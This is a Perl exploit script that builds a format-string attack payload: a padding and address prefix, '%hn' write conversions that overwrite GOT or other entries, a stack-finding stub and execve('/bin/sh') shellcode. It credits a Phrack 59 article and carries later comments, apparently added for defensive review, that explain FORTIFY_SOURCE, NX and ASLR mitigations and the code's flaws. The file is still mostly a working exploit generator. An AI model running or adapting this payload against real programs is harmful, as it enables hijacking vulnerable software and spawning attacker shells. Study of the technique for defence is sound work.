#!/usr/bin/perl
#Universal Format String exploit by dreyer
# based on article of gera of phrack 59
# Kato inspired Stack Finding shellcode
#
# Reviewer notes (defensive context):
#  - Everything below builds one payload string: a padding/address prefix
#    ($dirs), a run of "%<width>x%<pos>$hn" conversions ($writes), and the
#    shellcode itself ($shellcode). The "%n"-family write-what-where
#    primitive it relies on is exactly what -Wformat-security warnings and
#    _FORTIFY_SOURCE (which rejects %n in non-constant format strings) exist
#    to catch; NX stacks and ASLR also break the fixed 0xbfffe0e0 assumption.
#  - The file has no "use strict; use warnings;". $stackpop, $dir, $entries,
#    $dirs, $writes and $count are package globals shared between the subs
#    and the main body; $j in build_fmt is never declared with "my".
#  - All offsets are for a 32-bit little-endian target (4-byte addresses).

# Stack-finding stub: scans for the "KATO" marker and jumps to the position
# right after it (original comment translated).
$stackfinding="\xbb\x4a\x41\x54\x4f\x43\x58\x39\xd8\x75\xfb\x54\xc3";

# Marker bytes that do nothing on their own but let the stub above locate
# the shellcode (original comment translated).
$shellcode="KATOKKATOKKATOKKATO";

# The real shellcode; this one is Ripe's (original comment translated).
$shellcode.="\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

$dirs="";     # address/padding prefix of the payload
$writes="";   # accumulated "%<width>x%<pos>$hn" conversions
$count=0;     # running byte count already emitted by the format string

# Value written into every overwritten entry: 0xbfffe0e0 as little-endian
# bytes, the same address build_fmt() later targets with $stackfinding.
# "Where do we put the shellcode?" (original comment translated).
$writeto="\xe0\xe0\xff\xbf";

# Packs a 32-bit integer into four little-endian bytes.
#   $dir  - address to pack (only the low 32 bits are used)
# Returns the 4-character string.
sub dir_print {
    my $dir=pop;
    return sprintf("%c%c%c%c", $dir&0xFF, ($dir>>8)&0xFF, ($dir>>16)&0xFF, ($dir>>24)&0xFF );
}

# Seeds the payload with a padding string. Resets $dirs and $count to that
# string and its length, and advances $stackpop by one stack slot (4 bytes)
# per 4 padding bytes, so later "%<pos>$hn" positions point past the pad.
#   $aux  - padding string (the caller passes "A" x 100)
sub padding {
    my $aux=pop;
    $dirs=$aux;
    $count=length($aux);
    $stackpop+=$count/4;
}

# Pre-accounts for the 4 address bytes build_fmt() will append to $dirs for
# every byte of $cadena. Needed because all addresses are emitted before the
# first "%x" conversion, so $count must include them up front.
#   $cadena - the string that will later be passed to build_fmt()
sub prepare_fmt {
    my $cadena=pop;
    $count+=length($cadena)*4;
}

# Appends the addresses and conversions needed to write $what at $where.
#   $what   - byte string to write
#   $where  - target address of its first byte
# Side effects: appends one packed address per byte of $what to $dirs
# (addresses advance by 1 while each write is a 2-byte "%hn", so successive
# writes overlap and the following write fixes up the next byte), appends the
# matching "%<width>x%<pos>$hn" pairs to $writes, and advances the globals
# $count and $stackpop. Returns the updated $count.
# NOTE: "$j" is assigned via the comma operator and is not a "my" variable.
sub build_fmt {
    my ($what,$where)=@_;
    my $aux2;
    my $i=0,$j=length($what);
    # map in void context for its side effect on $dirs (a "for" would be idiomatic)
    map{$dirs.=&dir_print($where+$_)}0..$j-1;
    while ($i<$j) {
        my $trozo=substr($what,$i,1);
        # Choose a field width so the low byte of the emitted count equals the
        # target byte; wrap through 0x100 when the current count is already past
        # it. The "+4" slack in the comparison is not explained by the code.
        if (($count&0xff)+4>ord($trozo)) {
            $aux2=0x100+ord($trozo)-($count&0xff);
        } else {
            $aux2=ord($trozo)-($count&0xff);
        }
        # Interpolates to: %<aux2>x%<stackpop>$hn
        $writes.="\%${aux2}x\%${stackpop}\$hn";
        $count+=$aux2;
        $i++;
        $stackpop++;
    }
    return $count;
}

# Only checks that at least one argument exists, although three are read
# below; a missing $entries makes both loops run zero times.
if ($#ARGV<0) {
    print "Uso: $0 stackpop baseaddress entries\n";
    # "you can overwrite the whole GOT XD" (original comment translated)
    exit;
}

$stackpop=$ARGV[0];  # parameters (original comment translated)
$dir=$ARGV[1]+0;
$entries=$ARGV[2];

# "This is not optimal but it doesn't matter ;)" (original comment translated)
padding("A"x100);

my $dirc=$dir+0;

# First pass: mirror the address walk of the second loop to grow $count
# before any conversion is emitted. Addresses containing a zero byte are
# skipped in both loops (a NUL would terminate the format string).
for my $i(1..$entries) {
    $dirc+=4,next if !((($dirc)&0xff) && (($dirc>>8)&0xff) && (($dirc>>16)&0xff) && (($dirc>>24)&0xff));
    prepare_fmt($writeto);
    $dirc+=4;
}
prepare_fmt($stackfinding);

# Second pass: emit the actual writes of $writeto into each entry, then
# write the stack-finding stub at the fixed address 0xbfffe0e0.
for my $i(1..$entries) {
    $dir+=4,next if !((($dir)&0xff) && (($dir>>8)&0xff) && (($dir>>16)&0xff) && (($dir>>24)&0xff));
    build_fmt($writeto,$dir);
    $dir+=4;
}
build_fmt($stackfinding,0xbfffe0e0);

print $dirs.$writes.$shellcode;